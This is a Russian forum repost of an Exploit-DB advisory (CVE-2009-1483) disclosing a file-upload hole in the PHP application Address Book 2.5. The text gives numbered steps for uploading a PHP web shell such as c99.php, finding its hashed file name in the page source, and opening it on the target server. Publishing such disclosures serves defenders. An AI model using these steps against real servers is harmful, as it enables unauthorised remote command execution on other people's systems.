- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8481
- Проверка EDB
-
- Пройдено
- Автор
- JOSS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1483
- Дата публикации
- 2009-04-20
Код:
Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
- download: http://www.studiolounge.net/2007/08/17/address-book-25
- vuln file: upload-file.php
The upload-file.php doesn't check the type of archive
and you can uploaded the phpshell on the server.
~ [EXPLOITING]
1) /index2.php?title=add (upload your shell, ex: c99.php)
2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150)
3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php?
s=57b7b72739c79f02d990c4239c4169b9.php)
4) view shell: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php
__h0__
# milw0rm.com [2009-04-20]- Источник
- www.exploit-db.com
